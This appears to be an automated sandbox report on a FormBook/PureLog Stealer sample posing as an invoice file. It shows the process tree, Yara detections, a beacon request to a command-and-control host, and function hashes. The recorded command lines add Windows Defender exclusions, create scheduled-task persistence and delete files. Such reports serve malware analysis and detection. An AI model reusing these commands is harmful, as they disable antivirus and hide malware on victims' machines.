Jan 13, 2025 15:31:02.223870039 CET	164	OUT	GET /a03d/?S0G8J8=RRcPyliP5LCh&Urwh=7kIWeTjXu01wM95wC9Z21TPiKeV9inKAlApT+5tT392VMtn/oeqkDJdMplbadhcUzki4 HTTP/1.1 Host: www.kkkk.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Target ID:	0
Start time:	09:26:55
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\Invoice and packing list.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice and packing list.exe"
Imagebase:	0x6e0000
File size:	856'064 bytes
MD5 hash:	735A274389AF85C4B4F6CCD684B1B30A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2068007786.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2064262392.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:26:56
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe"
Imagebase:	0xec0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:26:56
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:26:56
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\utlAHqvw.exe"
Imagebase:	0xec0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:26:56
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:26:56
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp"
Imagebase:	0x750000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:26:56
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:26:56
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xde0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:26:57
Start date:	13/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000A.00000002.4504401224.000000000F929000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:26:58
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\utlAHqvw.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\utlAHqvw.exe
Imagebase:	0xc10000
File size:	856'064 bytes
MD5 hash:	735A274389AF85C4B4F6CCD684B1B30A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2097300869.000000000326D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:26:58
Start date:	13/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	09:27:01
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp"
Imagebase:	0x750000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:27:01
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:27:01
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xaf0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:27:02
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\NETSTAT.EXE"
Imagebase:	0xd90000
File size:	32'768 bytes
MD5 hash:	9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:27:02
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\autofmt.exe"
Imagebase:	0x60000
File size:	822'272 bytes
MD5 hash:	C72D80A976B7EB40534E8464957A979F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:27:03
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\autofmt.exe"
Imagebase:	0x60000
File size:	822'272 bytes
MD5 hash:	C72D80A976B7EB40534E8464957A979F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:27:03
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x650000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:27:05
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:27:05
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	157
Total number of Limit Nodes:	7

Executed Functions

Function 08D5ED58 Relevance: 6.8, Strings: 5, Instructions: 595
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 08D5F47F
(o]q, xrefs: 08D5F211
(o]q, xrefs: 08D5F205
,aq, xrefs: 08D5F1D7
,aq, xrefs: 08D5F1E3

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$,aq$,aq$Haq
API String ID: 0-2157538030
Opcode ID: 85f745d7aea76219bd2798f1254372af02893b1bb5c82c6264a09f3c50a295db
Instruction ID: 9a6f87ca96c5b10eae1ddc598a4d47cf2f6c6477d369a342c4792745efd1a44a
Opcode Fuzzy Hash: 85f745d7aea76219bd2798f1254372af02893b1bb5c82c6264a09f3c50a295db
Instruction Fuzzy Hash: B822BE34B00215CFDF15DF68C454A6E7BB2AF88382F15866AE8459B791CF31DD82CBA1

Function 08D50006 Relevance: 4.6, Instructions: 4582
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36e51570ec7127bb5a78d496cb2a836d3e2593133973d052ad3d2fe1cf553ef
Instruction ID: 49d40aa7dee03426fc2b00cf60e6890dae29c446130363468d93feb4bf4202ba
Opcode Fuzzy Hash: a36e51570ec7127bb5a78d496cb2a836d3e2593133973d052ad3d2fe1cf553ef
Instruction Fuzzy Hash: 3AB3D474A516198FCB24EF64C894AD9B3B2FF99300F1196E9D5486B361DB31AEC1CF80

Function 08D50040 Relevance: 4.6, Instructions: 4562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6312091c621b68733d9e5414af95afa83c0bc2b3edd1e8274b328921887100
Instruction ID: 503a4bbb02e32fbeb9ed5626973f386e8974e4b9d7a3e94ff9e4e1425e6d2c6c
Opcode Fuzzy Hash: 5c6312091c621b68733d9e5414af95afa83c0bc2b3edd1e8274b328921887100
Instruction Fuzzy Hash: 5EB3D474A516198FCB24EF64C894AD9B3B2FF99300F1196E9D5486B361DB31AEC1CF80

Function 08D556E8 Relevance: 3.4, Instructions: 3434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e126e456dfe7b91ec8eef495b29f46b586fae00c6ce7c4cadd50d52186318ec6
Instruction ID: ad945f10b52c8ae72e34c435c1f3bd9adde8ff6aa13a393894baca49818984f7
Opcode Fuzzy Hash: e126e456dfe7b91ec8eef495b29f46b586fae00c6ce7c4cadd50d52186318ec6
Instruction Fuzzy Hash: D183D474A116198FDB24EF68C894AE9B3B2FF99300F1156E9D5086B361DB31AED1CF40

Function 08D556D9 Relevance: 3.4, Instructions: 3420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a076305eed335d7993f976e9cfa4e1f47af68c4eb0ecb004273aafe11a2a1f9
Instruction ID: e13d418dea12251dbddb61b25ddbdac0948cc53dc46bc8f95f0ee0ebc38c7c31
Opcode Fuzzy Hash: 8a076305eed335d7993f976e9cfa4e1f47af68c4eb0ecb004273aafe11a2a1f9
Instruction Fuzzy Hash: 4583D474A116198FDB24EF68C884AE9B3B2FF99300F1156E9D5086B361DB31AED1CF40

Function 08D5DFEE Relevance: 1.8, Strings: 1, Instructions: 561
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 08D5DFF3

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 999b6ae8f06f2905e84e31299af9fc1892d3500af2a9c9dc29ce4824acc7ca76
Instruction ID: aee08c2d8e5859b1f3c9f18e76dec2a65f2623b683ca224a133d7e6e5ed332f5
Opcode Fuzzy Hash: 999b6ae8f06f2905e84e31299af9fc1892d3500af2a9c9dc29ce4824acc7ca76
Instruction Fuzzy Hash: B352DA74A002298FDB55DF68C898A9DBBB6FF89300F1081D9D549A73A5DB30AEC1CF51

Function 0C6E0040 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070992443.000000000C6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c6e0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b8412a6b8e85f34756f381d79b289b83dd79527d563a669acd19edb8fb8230
Instruction ID: 69da00a287a4b341c6e1b86fce2b2d6a9bbb6811d4cd553a1b0bd634073c6123
Opcode Fuzzy Hash: d5b8412a6b8e85f34756f381d79b289b83dd79527d563a669acd19edb8fb8230
Instruction Fuzzy Hash: A6226F74B021059FCB14DF68D594AAEBBF2FF88310F2581AAE505AB3A1DB70ED45CB50

Function 00E0D4E8 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E0D576
GetCurrentThread.KERNEL32 ref: 00E0D5B3
GetCurrentProcess.KERNEL32 ref: 00E0D5F0
GetCurrentThreadId.KERNEL32 ref: 00E0D649

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ea303cff9c1e489adcdf4aa6f35bf6315566267665690d604bfbdcef39b78a07
Instruction ID: 70226f42ada537ba4ed948aed9384c77c5d39584b4cc89a9ed980107295acd6c
Opcode Fuzzy Hash: ea303cff9c1e489adcdf4aa6f35bf6315566267665690d604bfbdcef39b78a07
Instruction Fuzzy Hash: 765153B0D053498FDB04DFA9D948BEEBBF1AB88304F20C459E409A73A1D7359984CF65

Function 00E0D4F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E0D576
GetCurrentThread.KERNEL32 ref: 00E0D5B3
GetCurrentProcess.KERNEL32 ref: 00E0D5F0
GetCurrentThreadId.KERNEL32 ref: 00E0D649

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e6228f8dddbda6350667008aa128a5ab90f1f7937babf6cb8b5784b39020a0e3
Instruction ID: 48b00089ec02bc504ae35847ac1e71dc03a104be90cdeb41c9199815e550fa31
Opcode Fuzzy Hash: e6228f8dddbda6350667008aa128a5ab90f1f7937babf6cb8b5784b39020a0e3
Instruction Fuzzy Hash: 5D5144B0D053098FDB04DFAAD948BAEBBF1EB88314F20C459E409A7391D775A984CF65

Function 071AB335 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071AB576

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e75df026d858919d558d568cb1b5c177e1e206ff5d2b4942bb0f56436c6bb0f7
Instruction ID: f42ae3e197be2a22510cf0be5d59659ec577a3ba65a2bd17b37736cc8caffa04
Opcode Fuzzy Hash: e75df026d858919d558d568cb1b5c177e1e206ff5d2b4942bb0f56436c6bb0f7
Instruction Fuzzy Hash: 29A19DB1D0425ADFDF21CF68C8817EDBBB2BF48314F148569E809A7280DB749985CF92

Function 071AB340 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071AB576

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dcbee5c9db7d14bc236744eafa28db58b790e10dd79fffea6b6a5e0f764e12ff
Instruction ID: bc2eee9bf9147979972fa72c9a2519dd6077f5eb59af015256c8f93d2844892f
Opcode Fuzzy Hash: dcbee5c9db7d14bc236744eafa28db58b790e10dd79fffea6b6a5e0f764e12ff
Instruction Fuzzy Hash: B9917DB1D0425ADFDF25CF68C8817EDBBB2BF44314F148569E809A7280DB749985CF92

Function 00E0B261 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E0B4C6

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fd6f4d80311677a06bc9131153ebdbe461d4cd1eb6fd3c78f5cc377a9bfdabb3
Instruction ID: cc0ba49bcc5a4940e943153dbf4c771054ecbc60159bb3892080571b5cee8b79
Opcode Fuzzy Hash: fd6f4d80311677a06bc9131153ebdbe461d4cd1eb6fd3c78f5cc377a9bfdabb3
Instruction Fuzzy Hash: 0C817970A00B458FD724DF29D08579ABBF1FF88304F10892DE48AE7A91D779E985CB91

Function 00E0590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E059C9

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
